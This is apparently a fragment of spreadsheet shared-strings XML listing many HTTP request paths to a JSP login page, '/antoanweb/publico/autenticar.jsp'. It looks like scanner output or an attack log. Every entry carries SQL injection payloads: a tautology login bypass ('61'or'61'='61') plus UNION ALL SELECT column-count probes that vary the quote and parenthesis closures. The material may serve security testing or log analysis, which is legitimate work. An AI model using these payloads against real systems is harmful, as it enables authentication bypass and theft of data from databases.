    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860,860--and('ptir'like'ptir&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097--and('oggf'like'oggf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182--and('vfqo'like'vfqo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491,5491--and('exhi'like'exhi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979,3979--and('egcz'like'egcz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341--and('wyww'like'wyww&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944--and('otsp'like'otsp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925--and('hcmj'like'hcmj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070,3070--and(('bhpe'like'bhpe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758--and(('cbgh'like'cbgh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937,5937--and(('xsef'like'xsef&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791,8791--and(('shkq'like'shkq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889,1889--and(('zrqk'like'zrqk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271--and(('vsiq'like'vsiq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548,3548--and(('ydwa'like'ydwa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214,7214--and(('vbey'like'vbey&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506,2506--and(('dsdy'like'dsdy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538,538--and(('mdft'like'mdft&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697,7697--and((('ertt'like'ertt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262--and((('ddpp'like'ddpp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611--and((('qxnf'like'qxnf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911,6911--and((('rpmz'like'rpmz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616--and((('twak'like'twak&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856,8856--and((('ablz'like'ablz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673--and((('islv'like'islv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794,3794--and((('wjpz'like'wjpz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309,4309--and((('moia'like'moia&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654--and((('zcxt'like'zcxt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662,5662--and'ouwb'like'ouwb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602,3602--and'jfai'like'jfai&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579--and'xzwr'like'xzwr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774--and'qohp'like'qohp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667,7667--and'qywf'like'qywf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772--and'qgxq'like'qgxq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849--and'tgha'like'tgha&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933,2933--and'tlex'like'tlex&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282--and'kpaq'like'kpaq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702,702--and'bpnw'like'bpnw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210,5210--and("zgqs"="zgqs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315--and("ufrp"="ufrp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103,2103--and("imsp"="imsp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653--and("idot"="idot&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405--and("kxyu"="kxyu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491,6491--and("uhwy"="uhwy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659,3659--and("rlfw"="rlfw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944--and("fxvd"="fxvd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425,8425--and("rkbs"="rkbs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986,986--and("relx"="relx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522--and(("fkfx"="fkfx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291--and(("gmdc"="gmdc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719,719--and(("vxal"="vxal&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228,1228--and(("xgcz"="xgcz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627,6627--and(("uuop"="uuop&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054,5054--and(("uhvr"="uhvr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844,4844--and(("jags"="jags&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546--and(("qarj"="qarj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659,4659--and(("pnyk"="pnyk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698--and(("scnh"="scnh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798,3798--and((("lolv"="lolv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345--and((("opoi"="opoi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396,1396--and((("colo"="colo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844,3844--and((("rgri"="rgri&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245,7245--and((("dwdx"="dwdx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486,4486--and((("ijcf"="ijcf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759,7759--and((("xkzr"="xkzr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068,1068--and((("vocd"="vocd&amp;modo=entrar</t>
  </si>
  <si>
